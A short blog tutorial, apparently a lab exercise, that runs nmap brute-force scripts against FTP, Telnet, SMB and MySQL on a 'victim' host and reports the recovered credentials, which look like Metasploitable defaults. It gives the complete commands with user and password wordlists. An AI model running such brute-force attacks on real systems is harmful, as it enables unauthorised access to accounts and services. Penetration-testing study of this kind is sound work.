In previous practical I had used
basic command to scan victim's PC and found open ports like ftp, Ssh, telnet,
snmp and etc. You can check from here.
But now the question is if we found
open ports what else we can do to retrieve the information of victim using nmap
scripts? To know your answer read ahead.
FTP BRUTE
Crack password using nmap brute
script of FTP.
nmap -p21 --script
ftp-brute.nse --script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt
192.168.1.105
From the scanning result I
have successfully got the FTP password of victim pc
msfadmin:msfadminas username and password.
TELNET BRUTE
Crack password using nmap brute
script of telnet.
nmap -p23 --script
telnet-brute.nse --script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt
192.168.1.105
I have successfully got the TELNET password of victim pc msfadmin:msfadminas username and
password.
SMB BRUTE
Crack password using nmap brute
script of SMB
Nmap –p445
--script smb-brute.nse --script-args
userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt
192.168.1.105
I have successfully got
the SMB password of victim pc msfadmin:msfadmin
and user:useras username and password.
MYSQL BRUTE
Crack password using nmap brute
script of MYSQL server
Nmap -sT -p3306 --script mysql-brute.nse
--script-args
userdb=/root/Desktop/user.txt
192.168.1.105
Here I found two user as root and guest with empty password for MySQL server
1 comments:
Excelente artículo. Gracias!!!
Post a Comment